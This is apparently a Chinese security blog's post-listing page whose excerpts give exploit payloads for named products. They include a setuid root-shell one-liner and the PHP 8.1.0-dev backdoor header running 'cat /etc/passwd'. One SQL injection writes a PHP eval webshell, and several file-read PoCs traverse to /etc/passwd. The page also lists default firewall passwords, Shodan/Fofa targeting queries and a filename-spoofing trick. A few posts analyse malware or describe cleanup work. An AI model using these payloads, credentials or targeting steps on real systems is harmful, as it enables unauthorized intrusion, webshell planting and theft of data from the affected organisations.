摘要: 0x00、前言 朋友发来一个图片,说自己买了某宝上steam激活sdk,结果客服发过来一个教程让他下载游戏,想问问我有没有问题。 0x01、看了图片后立刻来了兴趣。 命令很简单,先是IRM远程访问,然后IEX执行。 手动访问了一下cdk.yesilovemyhome.com,发现跳转steam官方商 阅读全文
posted @ 2024-02-28 23:07 逗比大师 阅读(11874) 评论(5) 推荐(1) 编辑
摘要: 前情提要:写了一篇清除挖矿脚本的博客,意在帮助大家遇到相似情境下分析并处置。 在垃圾平台尚未通过,经过多次删改依然未通过。而且同一篇文章以各种不同理由不通过,于是有了以下对话。 终于成功发出来。 在与客服沟通的过程中,感觉CSDN的客服全程就是“我不听,我不听,我不听”、“就是你的错”、“你知不知道 阅读全文
posted @ 2021-11-07 10:53 逗比大师 阅读(248) 评论(0) 推荐(0) 编辑
摘要: (1)详细说明 近日我捕获到一个利用Apache2.4.49漏洞(CVE-2021-41773)传播xmrig-6.14.1-linux-static-x64挖矿脚本的最新样本。样本文件名为aaa,file命令判断为ASCII脚本。如下图所示: 直接cat该文件 (2)样本分析 I. 该bash脚本 阅读全文
posted @ 2021-11-01 16:35 逗比大师 阅读(888) 评论(2) 推荐(1) 编辑
摘要: CVE-2021-41773是一个apache2.4.49的RCE漏洞,可以任意文件读取、远程代码执行 使用shodon.io搜索server: Apache/2.4.49 下载结果(json格式)并解析json脚本,获取url 使用工具批量利用 验证结果 阅读全文
posted @ 2021-11-01 14:41 逗比大师 阅读(2898) 评论(0) 推荐(1) 编辑
摘要: 1、shiro反序列化漏洞综合利用工具 优点:图形化、傻瓜化工具,一键getshell 缺点:利用链少,回显方式少 2、ShiroExploit 基于ysoserial项目开发,payload多 3、ysoserial配合shiro_tool ysoserial工具有多种payload 利用方式: 阅读全文
posted @ 2021-10-25 11:29 逗比大师 阅读(1666) 评论(1) 推荐(0) 编辑
摘要: https://unicode-table.com/en/202E/ 点击copy,复制这个不可见字符 新建文件,名为cod.txt 将该不可见字符复制到文件名最前方即可 原理:使用了不可见的阿拉伯字符,使文件名变成由右向左读的阿拉伯文。 阅读全文
posted @ 2021-10-11 14:32 逗比大师 阅读(308) 评论(0) 推荐(0) 编辑
摘要: Shodan: http.favicon.hash:-1153950306 http.favicon.hash:-2012355198 Fofa: (body="login_box_sonicwall" || header="SonicWALL SSL-VPN Web Server") && bod 阅读全文
posted @ 2021-10-09 17:46 逗比大师 阅读(2) 评论(0) 推荐(0) 编辑
摘要: ES文件浏览器是一款安卓系统常用的文件管理器,有文件管理、HTTP服务等多种功能 在v4.1.9.7.4版本下有个任意文件读取漏洞 exp: # Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06 阅读全文
posted @ 2021-08-11 17:40 逗比大师 阅读(525) 评论(0) 推荐(0) 编辑
摘要: python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' 阅读全文
posted @ 2021-08-11 17:02 逗比大师 阅读(415) 评论(0) 推荐(0) 编辑
摘要: PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 添加请求头 User-Agentt: zerodiumsystem("cat /etc/passwd"); 阅读全文
posted @ 2021-08-11 16:30 逗比大师 阅读(173) 评论(0) 推荐(0) 编辑
摘要: 前言 当拿到windows的shell但是没有图形化界面时(如cs的shell、msf的shell、命令执行的shell等),需要查询日志却无法使用日志查看器,可以使用wevtutil工具导出日志文件。 wevtutil工具常用命令 列出所有已注册的事件日志 C:\> wevtutil el 将Sy 阅读全文
posted @ 2021-04-19 09:44 逗比大师 阅读(3983) 评论(0) 推荐(0) 编辑
摘要: 请求包 POST /ormrpc/services/WSCostSharingFacade HTTP/1.1 Content-Type: text/xml; charset=UTF-8 SOAPAction: "getIndexValue" User-Agent: Axis2 Host: 10.8. 阅读全文
posted @ 2021-04-10 21:33 逗比大师 阅读(777) 评论(0) 推荐(0) 编辑
摘要: v10.0版本不受影响 FineReport V9 注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 阅读全文
posted @ 2021-04-09 16:36 逗比大师 阅读(962) 评论(0) 推荐(0) 编辑
摘要: POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C 阅读全文
posted @ 2021-04-09 16:35 逗比大师 阅读(175) 评论(0) 推荐(0) 编辑
摘要: /api/dbstat/gettablessize /webroot/ReportServer?op=fr_base&cmd=evaluate_formula&expression= 阅读全文
posted @ 2021-04-09 16:34 逗比大师 阅读(263) 评论(0) 推荐(0) 编辑
摘要: https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop 阅读全文
posted @ 2021-04-09 16:33 逗比大师 阅读(628) 评论(0) 推荐(0) 编辑
摘要: FOFA语句: title="Jellyfin" 可以通过访问 http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/ 读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5 阅读全文
posted @ 2021-04-09 16:32 逗比大师 阅读(796) 评论(0) 推荐(0) 编辑
摘要: /synccache.jsp?data=base64编码的java对象 阅读全文
posted @ 2021-04-09 16:30 逗比大师 阅读(257) 评论(0) 推荐(0) 编辑
摘要: 漏洞位于: /page/exportImport/uploadOperation.jsp文件中 Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈 重点关注File file=new File(savepath+filename), Filename参数,是 阅读全文
posted @ 2021-04-09 16:29 逗比大师 阅读(1519) 评论(0) 推荐(0) 编辑
摘要: 漏洞URL: http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpS 阅读全文
posted @ 2021-04-09 16:18 逗比大师 阅读(1957) 评论(0) 推荐(0) 编辑
摘要: /latrix/inandout.php txtaccesscode参数存在SQL注入漏洞 阅读全文
posted @ 2021-04-09 16:16 逗比大师 阅读(49) 评论(0) 推荐(0) 编辑
摘要: 漏洞关注点: /sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode] 漏洞在/sys/search/sys_search_main/sysSearch 阅读全文
posted @ 2021-04-09 16:13 逗比大师 阅读(2744) 评论(0) 推荐(0) 编辑
摘要: 分析发现是去年老洞(https://www.cnblogs.com/0day-li/p/13698863.html) 利用了两个漏洞 1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell 利用方式: def see 阅读全文
posted @ 2021-04-09 16:12 逗比大师 阅读(836) 评论(0) 推荐(0) 编辑
摘要: 管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。 默认用户superman的uid=1POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1 阅读全文
posted @ 2021-04-09 16:11 逗比大师 阅读(344) 评论(0) 推荐(0) 编辑
摘要: 目前测试影响版本:NC6.5 漏洞url为: /service/~xbrl/XbrlPersistenceServlet poc: import requests import threadpool import urllib3 import sys import base64 ip = "" dn 阅读全文
posted @ 2021-04-09 16:10 逗比大师 阅读(1920) 评论(0) 推荐(0) 编辑
摘要: 漏洞url: http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql 阅读全文
posted @ 2021-04-09 16:09 逗比大师 阅读(672) 评论(0) 推荐(0) 编辑
摘要: 访问:http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd (db为存在的应用名) 阅读全文
posted @ 2021-04-09 16:07 逗比大师 阅读(151) 评论(0) 推荐(0) 编辑
摘要: REQUEST: POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: Connection: close Content-Length: 85 Cache-Control: max-age=0 Sec-Ch-Ua: "Google C 阅读全文
posted @ 2021-04-09 16:03 逗比大师 阅读(209) 评论(0) 推荐(0) 编辑
摘要: 实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入 <?php phpinfo();?> 实际得到: \<?php phpinfo()\;?\> 分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一 阅读全文
posted @ 2021-03-24 10:03 逗比大师 阅读(647) 评论(1) 推荐(0) 编辑
摘要: Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get 阅读全文
posted @ 2020-09-27 11:06 逗比大师 阅读(1623) 评论(0) 推荐(0) 编辑
摘要: Microsoft Exchange远程代码执行漏洞(CVE-2020-16875) 漏洞信息: 由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码漏洞,该漏洞使攻击者可以通过向受影响的Exchange Server发送特制电子邮件来在SYSTEM执 阅读全文
posted @ 2020-09-21 11:46 逗比大师 阅读(2894) 评论(0) 推荐(1) 编辑
摘要: VMware Fusion cve-2020-3980权限提升 Apache Cocoon security vulnerability cve-2020-11991 Spring框架RFD(文件下载) CVE-2020-0618-SQLServer报表服务远程代码执行漏洞 CVE-2020-711 阅读全文
posted @ 2020-09-20 10:39 逗比大师 阅读(880) 评论(0) 推荐(0) 编辑
摘要: 2020年9月20日00:00左右,蜜罐设备告警发现攻击,溯源后,于全流量设备上捕捉到如下请求包 POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompr 阅读全文
posted @ 2020-09-20 10:01 逗比大师 阅读(1855) 评论(0) 推荐(0) 编辑
摘要: 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service P 阅读全文
posted @ 2020-09-16 05:52 逗比大师 阅读(632) 评论(0) 推荐(0) 编辑
摘要: 源代码分析: 问题出现在 ha_request.php 文件,第 37 行的 exec 函数,$url 为用户可控的变量,可见第 33 和 34 行。目光来到第 23 和 24 行,只要 node_request 函数的返回值为“OK”,即可跳过 fatal 函数(此函数为自定义函数,作用类似 PH 阅读全文
posted @ 2020-09-13 21:43 逗比大师 阅读(2602) 评论(0) 推荐(0) 编辑
摘要: 天融信防火墙 用户名:superman 密码:talent 天融信防火墙 用户名:superman 密码:talent!23 联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766 深信服防火墙 用户名:admin 密码:admin 启明星 阅读全文
posted @ 2020-09-13 21:37 逗比大师 阅读(4449) 评论(0) 推荐(0) 编辑
摘要: 上一篇文章:泛微云桥任意文件读取漏洞 利用方式: 第一步: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt 第二步: /file/fileNoLogin/id 注: downloadUrl参数填写文件的绝对 阅读全文
posted @ 2020-09-13 21:35 逗比大师 阅读(1406) 评论(0) 推荐(0) 编辑
摘要: saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port> (+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 1 阅读全文
posted @ 2020-09-13 21:18 逗比大师 阅读(512) 评论(0) 推荐(0) 编辑
摘要: 受影响版本: Apache Cocoon <= 2.1.x 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。 以下是apache社区官方提供利用方式: <!--?xml ver 阅读全文
posted @ 2020-09-13 21:15 逗比大师 阅读(1693) 评论(0) 推荐(0) 编辑
摘要: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* GET /file/f 阅读全文
posted @ 2020-09-12 17:38 逗比大师 阅读(3159) 评论(0) 推荐(0) 编辑